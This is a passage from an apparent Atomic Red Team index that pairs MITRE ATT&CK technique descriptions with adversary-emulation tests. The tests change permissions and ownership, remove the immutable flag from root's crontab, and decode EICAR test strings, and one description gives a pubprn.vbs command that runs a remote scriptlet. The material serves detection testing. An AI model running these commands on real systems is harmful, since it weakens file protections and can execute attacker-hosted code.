symbolic mode value type: string default: a+w file_or_folder: description: Path of the file or folder type: path default: "/tmp/AtomicRedTeam/atomics/T1222.002" executor: command: 'chmod #{symbolic_mode} #{file_or_folder} ' name: sh - name: chmod - Change file or folder mode (numeric mode) recursively auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 description: 'Changes a file or folder''s permissions recursively using chmod and a specified numeric mode. ' supported_platforms: - linux - macos input_arguments: numeric_mode: description: Specified numeric mode value type: integer default: 755 file_or_folder: description: Path of the file or folder type: path default: "/tmp/AtomicRedTeam/atomics/T1222.002" executor: command: 'chmod -R #{numeric_mode} #{file_or_folder} ' name: sh - name: chmod - Change file or folder mode (symbolic mode) recursively auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f description: 'Changes a file or folder''s permissions recursively using chmod and a specified symbolic mode. ' supported_platforms: - linux - macos input_arguments: symbolic_mode: description: Specified symbolic mode value type: string default: a+w file_or_folder: description: Path of the file or folder type: path default: "/tmp/AtomicRedTeam/atomics/T1222.002" executor: command: 'chmod -R #{symbolic_mode} #{file_or_folder} ' name: bash - name: chown - Change file or folder ownership and group auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 description: 'Changes a file or folder''s ownership and group information using chown. ' supported_platforms: - macos - linux input_arguments: owner: description: Username of desired owner type: string default: root file_or_folder: description: Path of the file or folder type: path default: "/tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml" group: description: Group name of desired group type: string default: root executor: command: 'chown #{owner}:#{group} #{file_or_folder} ' name: bash - name: chown - Change file or folder ownership and group recursively auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 description: 'Changes a file or folder''s ownership and group information recursively using chown. ' supported_platforms: - macos - linux input_arguments: owner: description: Username of desired owner type: string default: root file_or_folder: description: Path of the file or folder type: path default: "/tmp/AtomicRedTeam/atomics/T1222.002" group: description: Group name of desired group type: string default: root executor: command: 'chown -R #{owner}:#{group} #{file_or_folder} ' name: bash - name: chown - Change file or folder mode ownership only auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 description: 'Changes a file or folder''s ownership only using chown. ' supported_platforms: - linux - macos input_arguments: owner: description: Username of desired owner type: string default: root file_or_folder: description: Path of the file or folder type: path default: "/tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml" executor: command: 'chown #{owner} #{file_or_folder} ' name: sh - name: chown - Change file or folder ownership recursively auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 description: 'Changes a file or folder''s ownership only recursively using chown. ' supported_platforms: - macos - linux input_arguments: owner: description: Username of desired owner type: string default: root file_or_folder: description: Path of the file or folder type: path default: "/tmp/AtomicRedTeam/atomics/T1222.002" executor: command: 'chown -R #{owner} #{file_or_folder} ' name: bash - name: chattr - Remove immutable file attribute auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f description: | Remove's a file's `immutable` attribute using `chattr`. This technique was used by the threat actor Rocke during the compromise of Linux web servers. supported_platforms: - macos - linux input_arguments: file_to_modify: description: Path of the file type: path default: "/var/spool/cron/root" executor: command: 'chattr -i #{file_to_modify} ' name: sh - name: Chmod through c script auto_generated_guid: 973631cf-6680-4ffa-a053-045e1b6b67ab description: 'chmods a file using a c script ' supported_platforms: - macos - linux input_arguments: source_file: description: Path of c source file type: path default: PathToAtomicsFolder/T1222.002/src/T1222.002.c compiled_file: description: Path of compiled file type: path default: "/tmp/T1222002" dependency_executor_name: sh dependencies: - description: 'Compile the script from (#{source_file}). Destination is #{compiled_file} ' prereq_command: 'gcc #{source_file} -o #{compiled_file} ' get_prereq_command: 'gcc #{source_file} -o #{compiled_file} ' executor: command: "#{compiled_file} /tmp/ T1222002\n" name: sh - name: Chown through c script auto_generated_guid: 18592ba1-5f88-4e3c-abc8-ab1c6042e389 description: 'chowns a file to root using a c script ' supported_platforms: - macos - linux input_arguments: source_file: description: Path of c source file type: path default: PathToAtomicsFolder/T1222.002/src/chown.c compiled_file: description: Path of compiled file type: path default: "/tmp/T1222002own" dependency_executor_name: sh dependencies: - description: 'Compile the script from (#{source_file}). Destination is #{compiled_file} ' prereq_command: 'gcc #{source_file} -o #{compiled_file} ' get_prereq_command: 'gcc #{source_file} -o #{compiled_file} ' executor: command: 'sudo #{compiled_file} #{source_file} ' name: sh elevation_required: true T1216.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58 created: '2020-02-03T16:49:57.788Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1216/001 external_id: T1216.001 - source_name: pubprn description: Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021. url: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn - source_name: Enigma0x3 PubPrn Bypass description: 'Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.' url: https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:22.022Z' name: 'Signed Script Proxy Execution: Pubprn' description: |- Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn) Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script. In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S). kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Atul Nair, Qualys x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.1' identifier: T1216.001 atomic_tests: [] T1574.007: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32 created: '2020-03-13T14:10:43.424Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1574/007 external_id: T1574.007 - source_name: Elastic Rules macOS launchctl 2022 description: Elastic Security 7.17. (2022, February 1). Modification of Environment Variable via Launchctl. Retrieved September 28, 2023. url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variable-via-launchctl.html - source_name: ExpressVPN PATH env Windows 2021 description: 'ExpressVPN Security Team. (2021, November 16). Cybersecurity lessons: A PATH vulnerability in Windows. Retrieved September 28, 2023.' url: https://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/ - source_name: uptycs Fake POC linux malware 2023 description: 'Nischay Hegde and Siddartha Malladi. (2023, July 12). PoC Exploit: Fake Proof of Concept with Backdoor Malware. Retrieved September 28, 2023.' url: https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware - source_name: nixCraft macOS PATH variables description: Vivek Gite. (2023, August 22). MacOS – Set / Change $PATH Variable Command. Retrieved September 28, 2023. url: https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:22.736Z' name: Path Interception by PATH Environment Variable description: "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. \n\nAdversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.\n\nFor example, on Windows if an adversary places a malicious program named \"net.exe\" in `C:\\example path`, which by default precedes `C:\\Windows\\system32\\net.exe` in the PATH environment variable, when \"net\" is executed from the command-line the `C:\\example path` will be called instead of the system's legitimate executable at `C:\\Windows\\system32\\net.exe`. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: ExpressVPN PATH env Windows 2021)\n\nAdversaries may also directly modify the $PATH variable specifying the directories to be searched. An adversary can modify the `$PATH` variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or modifying the `/etc/paths.d` folder contents.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Stefan Kanthak x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - macOS - Linux x_mitre_version: '1.2' atomic_tests: [] T1006: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5 created: '2017-05-31T21:30:20.934Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1006 external_id: T1006 - source_name: Github PowerSploit Ninjacopy description: Bialek, J. (2015, December 16). Invoke-NinjaCopy.ps1. Retrieved June 2, 2016. url: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1 - source_name: Hakobyan 2009 description: Hakobyan, A. (2009, January 8). FDump - Dumping File Sectors Directly from Disk using Logical Offsets. Retrieved November 12, 2014. url: http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin - source_name: LOLBAS Esentutl description: LOLBAS. (n.d.). Esentutl.exe. Retrieved September 3, 2019. url: https://lolbas-project.github.io/lolbas/Binaries/Esentutl/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:23.015Z' name: Direct Volume Access description: |- Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009) Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Tom Simpson, CrowdStrike Falcon OverWatch x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Network Devices - Windows x_mitre_version: '2.3' identifier: T1006 atomic_tests: [] T1666: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e created: '2024-09-25T14:16:19.234Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1666 external_id: T1666 - source_name: AWS Organizations description: AWS. (n.d.). Terminology and concepts for AWS Organizations. Retrieved September 25, 2024. url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html - source_name: AWS RE:Inforce Threat Detection 2024 description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and techniques for proactive threat detection. Retrieved September 25, 2024. url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf - source_name: Microsoft Subscription Hijacking 2022 description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023. url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121 - source_name: Microsoft Azure Resources description: Microsoft Azure. (2024, May 31). Organize your Azure resources effectively. Retrieved September 25, 2024. url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources - source_name: Microsoft Peach Sandstorm 2023 description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm password spray campaigns enable intelligence collection at high-value targets. Retrieved September 18, 2023. url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T22:49:45.874Z' name: Modify Cloud Resource Hierarchy description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses. \n\nIaaS environments often group resources into a hierarchy, enabling improved resource management and application of policies to relevant groups. Hierarchical structures differ among cloud providers. For example, in AWS environments, multiple accounts can be grouped under a single organization, while in Azure environments, multiple subscriptions can be grouped under a single management group.(Citation: AWS Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy. For example, in Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources. They may also engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant. This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods registered to the payment account but may not be subject to existing detections or Service Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - IaaS x_mitre_version: '1.0' atomic_tests: [] T1564.008: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff created: '2021-06-07T13:20:23.767Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1564/008 external_id: T1564.008 - source_name: MacOS Email Rules description: Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021. url: https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac - source_name: Microsoft BEC Campaign description: 'Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021.' url: https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/ - source_name: Microsoft Mail Flow Rules 2023 description: Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023. url: https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules - source_name: Microsoft Inbox Rules description: Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021. url: https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59 - source_name: Microsoft New-InboxRule description: Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021. url: https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps - source_name: Microsoft Set-InboxRule description: Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021. url: https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps - source_name: Microsoft Cloud App Security description: Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021. url: https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:23.364Z' name: 'Hide Artifacts: Email Hiding Rules' description: |- Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule) Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account. Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security) In some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications). kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Dor Edry, Microsoft - Liran Ravich, CardinalOps x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - Linux - macOS - Office Suite x_mitre_version: '1.4' identifier: T1564.008 atomic_tests: [] T1027.013: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144 created: '2024-03-29T12:38:17.135Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1027/013 external_id: T1027.013 - source_name: File obfuscation description: Aspen Lindblom, Joseph Goodwin, and Chris Sheldon. (2021, July 19). Shlayer Malvertising Campaigns Still Using Flash Update Disguise. Retrieved March 29, 2024. url: https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/ - source_name: SFX - Encrypted/Encoded File description: Jai Minton. (2023, March 31). How Falcon OverWatch Investigates Malicious Self-Extracting Archives, Decoy Files and Their Hidden Payloads. Retrieved March 29, 2024. url: https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T19:58:05.840Z' name: 'Obfuscated Files or Information: Encrypted/Encoded File' description: "Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.\n\nThis type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64.\n\nThe entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.\n\nFor example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) \n\nAdversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution." kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - David Galazin @themalwareman1 - Andrew Northern, @ex_raritas - Jai Minton, @Cyberraiju x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.1' identifier: T1027.013 atomic_tests: - name: Decode Eicar File and Write to File auto_generated_guid: 7693ccaa-8d64-4043-92a5-a2eb70359535 description: Decode the eicar value, and write it to file, for AV/EDR to try to catch. supported_platforms: - windows - macos - linux executor: command: |- $encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo=" $bytes = [System.Convert]::FromBase64String($encodedString) $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes) #write the decoded eicar string to file $decodedString | Out-File T1027.013_decodedEicar.txt cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file. name: powershell elevation_required: false - name: Decrypt Eicar File and Write to File auto_generated_guid: b404caaa-12ce-43c7-9214-62a531c044f7 description: Decrypt the eicar value, and write it to file, for AV/EDR to try to catch. supported_platforms: - windows - macos - linux executor: command: |- $encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA=" $key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt)) #Write the decrypted eicar string to a file $decryptedString | out-file T1027.013_decryptedEicar.txt cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file. name: powershell elevation_required: false T1014: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b created: '2017-05-31T21:30:26.496Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1014 external_id: T1014 - source_name: CrowdStrike Linux Rootkit description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017. url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ - source_name: BlackHat Mac OSX Rootkit description: 'Pan, M., Tsai, S. (2014). You can’t see me: A Mac OS X Rootkit uses the tricks you haven''t known yet. Retrieved December 21, 2017.' url: http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf - source_name: Symantec Windows Rootkits description: Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017. url: https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf - source_name: Wikipedia Rootkit description: Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016. url: https://en.wikipedia.org/wiki/Rootkit object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:24.032Z' name: Rootkit description: "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)\n\nRootkits that reside or modify boot sectors are known as [Bootkit](https://attack.mitre.org/techniques/T1542/003)s and specifically target the boot process of the operating system." kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.3.0 x_mitre_contributors: - Menachem Goldstein x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.3' identifier: T1014 atomic_tests: [] T1036.007: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e created: '2021-08-04T20:54:03.066Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1036/007 external_id: T1036.007 - source_name: SOCPrime DoubleExtension description: 'Eugene Tkachenko. (2020, May 1). Rule of the Week: Possible Malicious File Double Extension. Retrieved July 27, 2021.' url: https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/ - source_name: PCMag DoubleExtension description: 'PCMag. (n.d.). Encyclopedia: double extension. Retrieved August 4, 2021.' url: https://www.pcmag.com/encyclopedia/term/double-extension - source_name: Seqrite DoubleExtension description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files with double extension?. Retrieved July 27, 2021. url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:25.732Z' name: 'Masquerading: Double File Extension' description: "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) \n\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a 